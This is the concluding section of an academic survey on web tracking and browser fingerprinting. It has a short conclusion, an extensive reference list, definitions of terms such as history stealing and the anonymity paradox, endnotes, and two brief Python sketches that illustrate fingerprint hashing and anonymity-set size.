In the last few years, a kind of cat-and-mouse game has taken place in the area of tracking techniques, most remarkably for storage-based ones. When a novel tracking technique was discovered, in some time (after a sufficient rise in user awareness) a related protective solution arrived, which was shortly followed by a new identification method. This cycle seems to repeat endlessly, over and over. Fortunately, history stealing seems to have been defeated; due to strong industrial intervention, it is very unlikely for new, widely adoptable and effective techniques to emerge. Nevertheless, for fingerprinting techniques, the match has just begun.

This process indicates where research is needed for enhancing user privacy. As the target of tracking shifted from the browser to the device, we expect a similar shift to biometric fingerprinting (i.e., tracking the person herself across multiple browsers, OSes, and devices). Although fingerprinting countermeasures are far from being perfect (or widespread), and complex protective methods are yet to be examined by the community (e.g., protecting both against font-based cross-browser fingerprinting and clock-skew measurement), we believe it is time for researchers to start thinking about how to cover biometric information sources.

REFERENCES

Aggarwal, G., Bursztein, E., Jackson, C., & Boneh, D. (2010). An analysis of private browsing modes in modern browsers. In Proceedings of the 19th USENIX Conference on Security (pp. 6-6). Berkeley, CA: USENIX Association.
Ayenson, M., Wambach, D. J., Soltani, A., Good, N., & Hoofnagle, C. J. (2011). Flash Cookies and Privacy II: Now with HTML5 and ETag Respawning. Social Science Research Network. Retrieved November 13, 2012, from http://ssrn.com/abstract=1898390

Baron, D. (2002). Bug 147777 – :visited support allows queries into global history. Bugzilla@Mozilla. Retrieved November 13, 2012, from https://bugzilla.mozilla.org/show_bug.cgi?id=147777

Baron, D. (2010). Preventing attacks on a user's history through CSS :visited selectors. David Baron's homepage. Retrieved November 13, 2012, from http://dbaron.org/mozilla/visited-privacy

Benninger, C. (2006). AJAX Storage: A Look at Flash Cookies and Internet Explorer Persistence. Technical report. Retrieved November 13, 2012, from http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.128.2523

BlueCava. (2012). BlueCava releases "cookie-less" device identification technology for online advertisers. Press release. Retrieved November 13, 2012, from http://www.bluecava.com/news-release/bluecava-releases-cookie-less-device-identification-technology-for-online-advertisers/

Boda, K., Földes, Á. M., Gulyás, G. Gy., & Imre, S. (2012). User Tracking on the Web via Cross-Browser Fingerprinting. In P. Laud (Ed.), Information Security Technology for Applications: 16th Nordic Conference on Secure IT Systems, NordSec 2011, Tallinn, Estonia, October 26-28, 2011, Revised Selected Papers (pp. 31-46). Heidelberg, Germany: Springer-Verlag Berlin. Retrieved from http://dx.doi.org/10.1007/978-3-642-29615-4_4

Bortz, A., Boneh, D., & Nandy, P. (2007). Exposing Private Information by Timing Web Applications. In Proceedings of the 16th International Conference on World Wide Web (pp. 621–628). New York: ACM Press. Retrieved from http://doi.acm.org/10.1145/1242572.1242656

Broenink, R. (2012). Using Browser Properties for Fingerprinting Purposes. Presented at the 16th Twente Student Conference on IT. Enschede, The Netherlands.

Buckinx, W., & Van den Poel, D. (2005). Predicting Online Purchasing Behavior. European Journal of Operational Research, 166(2), 557–575. doi:10.1016/j.ejor.2004.04.022

Bursztein, E. (2011, July 22). Tracking users that block cookies with a HTTP redirect. Elie Bursztein's homepage. Retrieved November 13, 2012, from http://elie.im/blog/security/tracking-users-that-block-cookies-with-a-http-redirect/

Chairunnanda, P., Pham, N., & Hengartner, U. (2011). Privacy: Gone with the Typing! Identifying Web Users by Their Typing Patterns. Presented at 4th Hot Topics in Privacy Enhancing Technologies, in conjunction with the 11th Privacy Enhancing Technologies Symposium. Waterloo, Canada.

Chandna, P. (2011). Adobe Releases Flash Player 10.3, Solves the 'Flash Problem'. Maximum PC. Retrieved November 13, 2012, from http://www.maximumpc.com/article/news/adobe_releases_flash_player_103_solves_flash_problem

Cranor, L. F. (2003). 'I Didn't Buy it for Myself': Privacy and Ecommerce Personalization. Institute for Software Research. Retrieved November 13, 2012, from http://repository.cmu.edu/isr/37

Cross-browser fingerprinting test 2.0. (2012). Retrieved November 13, 2012, from http://fingerprint.pet-portal.eu/?lang=en

Danis, M. (2011). Analysis of user tracking techniques in web feeds. Bachelor of Science Thesis. Retrieved November 13, 2012, from http://pet-portal.eu/files/articles/2011/rss_tracking/rss_tracking.pdf (in Hungarian)
Davidov, M. (2011). The Double-Edged Sword of HSTS Persistence and Privacy. Leviathan Security Group. Retrieved November 13, 2012, from http://www.leviathansecurity.com/blog/archives/12-The-Double-Edged-Sword-of-HSTS-Persistence-and-Privacy.html

Davis, J. (2000). American consumers will force e-tailers to just say no to dynamic pricing. InfoWorld, 22(41), 116.

Eckersley, P. (2010). How unique is your web browser? In M. J. Atallah & N. J. Hopper (Eds.), Privacy Enhancing Technologies: 10th International Symposium, PETS 2010, Berlin, Germany, July 21-23, 2010. Proceedings (pp. 1-18). Heidelberg, Germany: Springer-Verlag Berlin. doi:10.1007/978-3-642-14527-8_1

Efrati, A. (2011, May). 'Like' Button Follows Web Users. The Wall Street Journal. Retrieved November 13, 2012, from http://online.wsj.com/article/SB10001424052748704281504576329441432995616.html

Feher, C., Elovici, Y., Moskovitch, R., Rokach, L., & Schclar, A. (2012). User Identity Verification via Mouse Dynamics. Information Sciences: An International Journal, 201, 19–36. doi:10.1016/j.ins.2012.02.066

Felten, E. W., & Schneider, M. A. (2000). Timing Attacks on Web Privacy. In Proceedings of the 7th ACM Conference on Computer and Communications Security (pp. 25–32). New York: ACM Press. Retrieved from http://doi.acm.org/10.1145/352600.352606

FireGloves. (2012). FireGloves 1.2.3. Add-ons for Firefox. Retrieved November 13, 2012, from https://addons.mozilla.org/hu/firefox/addon/firegloves/

Fitzpatrick, A. (2012). 'Politwoops' Collects Politicians' Deleted Tweets. Mashable. Retrieved November 13, 2012, from http://mashable.com/2012/05/30/politwoops/

Goldfarb, A., & Tucker, C. E. (2011, January). Privacy Regulation and Online Advertising. Management Science, 57(1), 57–71. doi:10.1287/mnsc.1100.1246

Goldfarb, A., & Tucker, C. E. (2011). Online advertising, behavioral targeting, and privacy. Communications of the ACM, 54(5), 25–27. doi:10.1145/1941487.1941498

Golle, P., & Partridge, K. (2009). On the Anonymity of Home/Work Location Pairs. In H. Tokuda, M. Beigl, A. Friday, A. J. Brush, & Y. Tobe (Eds.), Pervasive Computing: 7th International Conference, Pervasive 2009, Nara, Japan, May 11-14, 2009. Proceedings (pp. 390-397). Berlin, Germany: Springer-Verlag. doi:10.1007/978-3-642-01516-8_26

Gomez, J., Pinnick, T., Soltani, A., Carver, B., Makker, S., & Mccans, M. (2009). Know Privacy. Technical report. Retrieved November 13, 2012, from http://knowprivacy.org/report/KnowPrivacy_Final_Report.pdf

Grossmann, J. (2007, April 20). Tracking users with Basic Auth [Web log comment]. Retrieved November 13, 2012, from http://jeremiahgrossman.blogspot.hu/2007/04/tracking-users-without-cookies.html

Gulyás, G. (2009). Facebook – The Big Brother is watching you [Web log comment]. Retrieved November 13, 2012, from http://pet-portal.eu/blog/read/174/

Gulyás, G. Gy., Schulcz, R., & Imre, S. (2008). Comprehensive analysis of web privacy and anonymous web browsers: Are next generation services based on collaborative filtering? In L. Capra, I. Wakeman, N. Foukia, & S. Marsh (Eds.), Proceedings of the Joint SPACE and TIME Workshops 2008 (Part of IFIPTM 2008 – Joint iTrust and PST Conferences on Privacy, Trust Management and Security) (pp. 17-32). Trondheim, Norway.
Gulyás, G. G., Schulcz, R., & Imre, S. (2012). Separating Private and Business Identities. In R. Sharman, S. Das Smith, & M. Gupta (Eds.), Digital Identity and Access Management: Technologies and Frameworks (pp. 114-132). Hershey, PA: Information Science Reference. doi:10.4018/978-1-61350-498-7.ch007

Huang, D., Yang, K., Ni, C., Teng, W., Hsiang, T., & Lee, Y. (2012). Clock Skew Based Client Device Identification in Cloud Environments. In Proceedings of the 2012 IEEE 26th International Conference on Advanced Information Networking and Applications (pp. 526–533). Fukuoka, Japan: IEEE. Retrieved from http://doi.ieeecomputersociety.org/10.1109/AINA.2012.51

Huber, M., Mulazzani, M., & Weippl, E. (2010). Tor HTTP usage and information leakage. In B. De Decker & I. Schaumüller-Bichl (Eds.), Communications and Multimedia Security: 11th IFIP TC 6/TC 11 International Conference, CMS 2010, Linz, Austria, May 31 – June 2, 2010. Proceedings (pp. 245-255). Berlin, Germany: Springer-Verlag. doi:10.1007/978-3-642-13241-4_22

Interactive Advertising Bureau (IAB). (2012, June 11). Internet Advertising Revenues Set First Quarter Record at $8.4 Billion. Interactive Advertising Bureau Press Release. Retrieved November 13, 2012, from http://www.iab.net/about_the_iab/recent_press_releases/press_release_archive/press_release/pr-061112

IpToCountry. (2012). FREE IP to Country Database. WEBNet77. Retrieved November 13, 2012, from http://software77.net/geo-ip/

Jackson, C., Bortz, A., Boneh, D., & Mitchell, J. C. (2006). Protecting Browser State from Web Privacy Attacks. In Proceedings of the 15th International Conference on World Wide Web (pp. 737–744). New York: ACM Press. Retrieved from http://doi.acm.org/10.1145/1135777.1135884

Jakobsson, M., Juels, A., & Ratkiewicz, J. (2008). Privacy-Preserving History Mining for Web Browsers. In Proceedings of the Web 2.0 Security and Privacy 2008. Washington, DC: IEEE Computer Society.

Jakobsson, M., & Stamm, S. (2006). Invasive Browser Sniffing and Countermeasures. In Proceedings of the 15th International Conference on World Wide Web (pp. 523–532). New York: ACM Press. Retrieved from http://doi.acm.org/10.1145/1135777.1135854

Jakobsson, M., & Stamm, S. (2007). Web Camouflage: Protecting Your Clients from Browser-Sniffing Attacks. IEEE Security and Privacy, 5(6), 16–24. doi:10.1109/MSP.2007.182

Janc, A., & Olejnik, L. (2010). Feasibility and Real-World Implications of Web Browser History Detection. In Proceedings of the Web 2.0 Security and Privacy 2010. Washington, DC: IEEE Computer Society.

Janc, A., & Olejnik, L. (2010). Web Browser History Detection as a Real-World Privacy Threat. In D. Gritzalis, B. Preneel, & M. Theoharidou (Eds.), Computer Security – ESORICS 2010: 15th European Symposium on Research in Computer Security, Athens, Greece, September 20-22, 2010. Proceedings (pp. 215–231). Berlin, Germany: Springer-Verlag.

Jang, D., Jhala, R., Lerner, S., & Shacham, H. (2010). An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications. In Proceedings of the 17th ACM Conference on Computer and Communications Security (pp. 270–283). New York: ACM Press. Retrieved from http://doi.acm.org/10.1145/1866307.1866339

JonDo. (2012). JonDoFox – Anonymous and secure web surfing. JonDoNym – The anonymisation service. Retrieved November 13, 2012, from https://anonymous-proxy-servers.net/en/jondofox.html
JonDo Test. (2012). IP Check: Next generation of website tracking analysis. JonDoNym – The anonymisation service. Retrieved November 13, 2012, from http://ip-check.info/description.php

Kamkar, S. (2010, September 20). Evercookie. Samy Kamkar's homepage. Retrieved November 13, 2012, from http://samy.pl/evercookie/

Kohno, T., Broido, A., & Claffy, K. C. (2005). Remote physical device fingerprinting. IEEE Transactions on Dependable and Secure Computing, 2(2), 93–108. doi:10.1109/TDSC.2005.26

Kontaxis, G., Polychronakis, M., Keromytis, A. D., & Markatos, E. P. (2012). Privacy-Preserving Social Plugins. In Proceedings of the 21st USENIX Conference on Security Symposium (pp. 30-30). Berkeley, CA: USENIX Association.

Krane, D. (2008). Majority Uncomfortable with Websites Customizing Content Based Visitors Personal Profiles. Harris Interactive press release. Retrieved November 13, 2012, from http://www.harrisinteractive.com/vault/Harris-Interactive-Poll-Research-Majority-Uncomfortable-with-Websites-Customizing-C-2008-04.pdf

Krishnamurthy, B. (2010). Privacy leakage on the Internet. Presented at the 77th Internet Engineering Task Force. Anaheim, CA.

Krishnamurthy, B., & Wills, C. E. (2006). Generating a privacy footprint on the Internet. In Proceedings of the 6th ACM SIGCOMM Conference on Internet Measurement (pp. 65-70). New York: ACM Press. Retrieved from http://doi.acm.org/10.1145/1177080.1177088

Krishnamurthy, B., & Wills, C. E. (2009). Privacy diffusion on the web: A longitudinal perspective. In Proceedings of the 18th International Conference on World Wide Web (pp. 541-550). New York: ACM Press. Retrieved from http://doi.acm.org/10.1145/1526709.1526782

Local Shared Objects. (2012). Local shared object. Wikipedia. Retrieved November 13, 2012, from http://en.wikipedia.org/wiki/Local_shared_object

Loveless, A. (2011). EU Cookie Law – It ain't all about cookies (or browsers). Enchilada. Retrieved November 13, 2012, from http://www.enchiladadigital.com/2011/07/24/eu-cookie-law-cookies-browsers/

Mansour. (2011). visipisi. Retrieved November 13, 2012, from http://oxplot.github.com/visipisi/visipisi.html

Marshall, J. (2011). Device Fingerprinting Could Be Cookie Killer. ClickZ – Marketing News & Expert Advice. Retrieved November 13, 2012, from http://www.clickz.com/clickz/news/2030243/device-fingerprinting-cookie-killer

Mayer, J. (2009). "Any person... a pamphleteer": Internet Anonymity in the Age of Web 2.0. Unpublished thesis. Retrieved November 13, 2012, from http://www.stanford.edu/~jmayer/papers/thesis09.pdf

Mayer, J. R., & Mitchell, J. C. (2012). Third-Party Web Tracking: Policy and Technology. In Proceedings of the 2012 IEEE Symposium on Security and Privacy (pp. 413-427). Washington, DC: IEEE Computer Society. Retrieved from http://dx.doi.org/10.1109/SP.2012.47

McDonald, A. M., & Cranor, L. F. (2010). Beliefs and behaviors: Internet users' understanding of behavioral advertising. In Proceedings of the 38th Research Conference on Communication, Information and Internet Policy. Arlington, VA: TPRC.

Miller, T. (2002). Passive OS Fingerprinting: Details and Techniques. The SANS Institute. Retrieved November 13, 2012, from http://www.ouah.org/incosfingerp.htm
Mowery, K., Bogenreif, D., Yilek, S., & Shacham, H. (2011). Fingerprinting Information in JavaScript Implementations. In Proceedings of Web 2.0 Security and Privacy 2011. Washington, DC: IEEE Computer Society.

Mowery, K., & Shacham, H. (2012). Pixel Perfect: Fingerprinting Canvas in HTML5. In Proceedings of Web 2.0 Security and Privacy 2012. Washington, DC: IEEE Computer Society.

Mulliner, C. (2010). Random tales from a mobile phone hacker. Presented at CanSecWest 2010. Vancouver, BC.

Norbert. (2011). Web browser fingerprinting. SecurityAnaly.st Blog. Retrieved from http://securityanaly.st/browser-fingerprinting/

Oracle. (2011). Oracle Adaptive Access Manager. Oracle Fusion Middleware. Retrieved November 13, 2012, from http://www.oracle.com/technetwork/middleware/id-mgmt/oaam11gr1ps1-ds-398161.pdf

Perry, M. (2011, April 9). Ticket #2872: Limit the fonts available in TorBrowser. Tor Bug Tracker & Wiki. Retrieved November 13, 2012, from https://trac.torproject.org/projects/tor/ticket/2872

Perry, M. (2011, April 10). Torbutton Design Documentation. Technical report. Retrieved November 13, 2012, from https://www.torproject.org/torbutton/en/design/#fingerprinting

Perry, M. (2011, September 26). Ticket #4099: Disable TLS Session resumption and Session IDs. Tor Bug Tracker & Wiki. Retrieved November 13, 2012, from https://trac.torproject.org/projects/tor/ticket/4099

Perry, M., Clark, E., & Murdoch, S. (2011, December 28). The Design and Implementation of the Tor Browser. Technical report. Retrieved November 13, 2012, from https://www.torproject.org/projects/torbrowser/design/

Pfitzmann, A., & Hansen, M. (2010). A terminology for talking about privacy by data minimization: Anonymity, Unlinkability, Undetectability, Unobservability, Pseudonymity, and Identity Management. Privacy and Data Security, TU Dresden, Faculty of Computer Science, Institute of Systems Architecture. Retrieved November 13, 2012, from http://dud.inf.tu-dresden.de/Anon_Terminology.shtml

Regalado, A. (2012, June 22). Online Ads That Know Who You Know. MIT Technology Review. Retrieved November 13, 2012, from http://www.technologyreview.com/news/428048/online-ads-that-know-who-you-know/

Reschl, P., Mulazzani, M., Huber, M., & Weippl, E. (2011). Poster Abstract: Efficient Browser Identification with JavaScript Engine Fingerprinting. In Proceedings of the Annual Computer Security Applications Conference 2011 (ACSAC). Orlando, FL: ACM.

Roesner, F., Kohno, T., & Wetherall, D. (2012). Detecting and Defending Against Third-Party Tracking on the Web. In Proceedings of the 9th USENIX Symposium on Networked Systems Design and Implementation (pp. 12-12). Berkeley, CA: USENIX Association.

Ruef, M. (2008). Browserrecon. Browserrecon project – Advanced web browser fingerprinting. Retrieved November 13, 2012, from http://www.computec.ch/projekte/browserrecon/

Schmücker, N. (2011). Web Tracking. Technical report. Retrieved November 13, 2012, from http://www.snet.tu-berlin.de/fileadmin/fg220/courses/SS11/snet-project/web-tracking_schmuecker.pdf

Shankland, S. (2010). Google real-time search: 6 min. to spot quake. Deep Tech – CNET News. Retrieved November 13, 2012, from http://news.cnet.com/8301-30685_3-10428590-264.html
Simpson, G. H. (2005, March 31). United Virtualities develops ID backup to cookies: Browser-based 'Persistent Identification Element' will also restore erased cookie. Whiptech Technologies. Retrieved November 13, 2012, from http://www.whiptech.com/services.security/PIE.and.Cookies.html

Soltani, A. (2011). Respawn redux (Follow up to Flash Cookies and Privacy II). Ashkan Soltani's homepage. Retrieved November 13, 2012, from http://ashkansoltani.org/docs/respawn_redux.html

Soltani, A., Canty, S., Mayo, Q., Thomas, L., & Hoofnagle, C. J. (2009, August 10). Flash Cookies and Privacy. Social Science Research Network. Retrieved November 13, 2012, from http://ssrn.com/abstract=1446862

Stamm, S. (2010). Plugging the CSS History Leak. Mozilla Security Blog. Retrieved November 13, 2012, from https://blog.mozilla.org/security/2010/03/31/plugging-the-css-history-leak/

Stat Owl. (2012). Rich Internet Application Market Share. Retrieved November 13, 2012, from http://www.statowl.com/custom_ria_market_penetration.php

The Simple Computer. (2012, June 10). Coping Mechanisms: Fingerprinting, CDI and How to Deal with it. the_simple_computer – digital security and privacy made easy. Retrieved November 13, 2012, from http://thesimplecomputer.info/fingerprinting-and-clientless-device-identification.html

ThreatMetrix. (2012). ThreatMetrix™ Cybercrime Defender Platform Datasheet. ThreatMetrix | Advanced Cybercrime Prevention Solutions. Retrieved November 13, 2012, from http://www.threatmetrix.com/docs/ThreatMetrix-Cybercrime-Defender-Platform.pdf

Tor. (2012). Tor Browser Bundle. Tor Project. Retrieved November 13, 2012, from https://www.torproject.org/projects/torbrowser.html.en

TRUSTe. (2009). 2009 Study: Consumer Attitudes About Behavioral Targeting. Research report. Retrieved November 13, 2012, from http://www.truste.com/pdf/TRUSTe_TNS_2009_BT_Study_Summary.pdf

TRUSTe & Harris Interactive. (2011). Privacy and online behavioral advertising. Retrieved November 13, 2012, from http://truste.com/ad-privacy/TRUSTe-2011-Consumer-Behavioral-Advertising-Survey-Results.pdf

Turow, J., King, J., Hoofnagle, C. J., Bleakley, A., & Hennessy, M. (2009). Americans reject tailored advertising and three activities that enable it. Social Science Research Network. Retrieved November 13, 2012, from http://papers.ssrn.com/sol3/papers.cfm?abstract_id=1478214

Viecco, C. (2012). Bug 732096 – Add a preference to prevent local font enumeration. Bugzilla@Mozilla. Retrieved November 13, 2012, from https://bugzilla.mozilla.org/show_bug.cgi?id=732096

Wang, Y., Burgener, D., Flores, M., Kuzmanovic, A., & Huang, C. (2011). Towards Street-Level Client-Independent IP Geolocation. In Proceedings of the 8th USENIX Conference on Networked Systems Design and Implementation (pp. 27-41). Berkeley, CA: USENIX Association.

Weinberg, Z., Chen, E. Y., Jayaraman, P. R., & Jackson, C. (2011). I Still Know What You Visited Last Summer: Leaking Browsing History via User Interaction and Side Channel Attacks. In Proceedings of the 2011 IEEE Symposium on Security and Privacy (pp. 147–161). Washington, DC: IEEE Computer Society. Retrieved from http://dx.doi.org/10.1109/SP.2011.23

Wondracek, G., Holz, T., Kirda, E., & Kruegel, C. (2010). A Practical Attack to De-Anonymize Social Network Users. In Proceedings of the 2010 IEEE Symposium on Security and Privacy (pp. 223–238). Washington, DC: IEEE Computer Society. doi:10.1109/SP.2010.21
Wramner, H. (2011). Tracking Users on the World Wide Web. Unpublished Master's thesis. Retrieved November 13, 2012, from http://www.nada.kth.se/utbildning/grukth/exjobb/rapportlistor/2011/rapporter11/wramner_henrik_11041.pdf

Yampolskiy, R. V., & Govindaraju, V. (2008). Behavioural biometrics: A survey and classification. International Journal of Biometrics, 1(1), 81–113. doi:10.1504/IJBM.2008.018665

Yen, T., Huang, X., Monrose, F., & Reiter, M. K. (2009). Browser Fingerprinting from Coarse Traffic Summaries: Techniques and Implications. In U. Flegel & D. Bruschi (Eds.), Detection of Intrusions and Malware, and Vulnerability Assessment: 6th International Conference, DIMVA 2009, Como, Italy, July 9-10, 2009. Proceedings (pp. 157–175). Berlin, Germany: Springer-Verlag. Retrieved from http://dx.doi.org/10.1007/978-3-642-02918-9_10

Yue, C., & Wang, H. (2009). Characterizing Insecure JavaScript Practices on the Web. In Proceedings of the 18th International Conference on World Wide Web (pp. 961-970). New York: ACM Press.

Zalewski, M. (2011). Rapid history extraction through non-destructive cache timing (v8). lcamtuf.coredump.cx. Retrieved November 13, 2012, from http://lcamtuf.coredump.cx/cachetime/

KEY TERMS AND DEFINITIONS

Anonymity Paradox: The problem of increasing identifiability when concealing (private) information. In other words, a user is likely to end up in a rather small anonymity set if the substitute (fake) information is not chosen carefully.

Behavioral Tracking and Advertising: A way of observing and analyzing the user's interaction with one or more Websites, rather than simply registering Webpage downloads. The collected information may include the contents of the clipboard, mouse heatmaps, keystrokes, scroll reach, and so forth, which is later used for behavioral advertising (i.e., when advertisements are tailored to predicted user behavior).

Fingerprint: A set of attributes or settings that uniquely identifies a selected entity within a set of others (e.g., the browser/device of a visitor among those of other visitors).

History Stealing: Also referred to as history leakage, history detection, or history sniffing; a way of extracting a part of the browser's history (or other state-descriptive information) without the consent of the user. Such an attack normally cannot acquire the entire browsing history; the adversary must choose a set of addresses to check before delivering the attack.

Identification, Tracking, and Profiling: In the context of the Web, these terms refer to a website uniquely identifying visitors and tracking their actions in order to create profiles of them. These profiles are later monetized, for example by showing advertisements tailored to the profile, and therefore to the preferences of the visitor.

Implicit and Explicit Data: Explicit data refers to a piece of information communicated by the client (e.g., the user agent string) or published on the Web, while implicit data refers to information that can be extrapolated from the actions, behavior, status, attributes, and so forth of the client, or from other explicit data.

Storage-Based Tracking: Regular tracking techniques store an identifier on the client (e.g., as browser cookies) in order to be able to identify returning visitors and monitor their activities.

ENDNOTES

1 http://www.clicktale.com
2 Also called Web beacons, clear GIFs, 1x1 GIFs, tracking pixels, pixel tags, or simply pixels.
3 Firesheep raised awareness of Facebook session cookies transmitted without protection: http://codebutler.github.com/firesheep/
4 Stealing Gmail session cookies via active sidejacking: http://seclists.org/bugtraq/2007/Aug/70
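The Fingerprint definition above (together with Implicit and Explicit Data) can be made concrete with a minimal sketch. This is an illustration in Python rather than in-browser JavaScript, and the attribute names and values are invented examples, not a real browser API:

```python
import hashlib

def fingerprint(attributes: dict) -> str:
    """Hash a canonical, sorted rendering of client attributes
    (explicit data such as the user agent string, plus implicit
    data such as screen size or installed fonts)."""
    canonical = "|".join(f"{key}={attributes[key]}" for key in sorted(attributes))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()[:16]

# Two visitors differing in a single attribute receive unrelated
# fingerprints, so even small configuration differences are identifying.
visitor_a = {"user_agent": "Mozilla/5.0 (X11; Linux x86_64)",
             "screen": "1920x1080",
             "timezone": "UTC+1",
             "fonts": "Arial,Calibri,Verdana"}
visitor_b = dict(visitor_a, timezone="UTC+2")

print(fingerprint(visitor_a) == fingerprint(visitor_a))  # True: deterministic
print(fingerprint(visitor_a) == fingerprint(visitor_b))  # False: distinguishable
```

Unlike storage-based tracking, nothing is written to the client here; the identifier is recomputed from observed attributes on every visit.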
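The Anonymity Paradox definition can be sketched the same way: substituting a rare (fake) attribute value for a common one shrinks the visitor's anonymity set rather than enlarging it. The distribution below is invented purely for illustration:

```python
from collections import Counter

# Hypothetical user-agent distribution across 1,000 observed visitors.
user_agents = Counter({"Chrome/21": 620, "Firefox/15": 310,
                       "IE/9": 60, "PrivacyBrowser/1.0": 10})

def anonymity_set_size(value: str) -> int:
    """A visitor reporting `value` hides among all visitors reporting it."""
    return user_agents[value]

# A Firefox user who spoofs an unusual user agent becomes *more*
# identifiable: the anonymity set shrinks from 310 visitors to 10.
print(anonymity_set_size("Firefox/15"))          # 310
print(anonymity_set_size("PrivacyBrowser/1.0"))  # 10
```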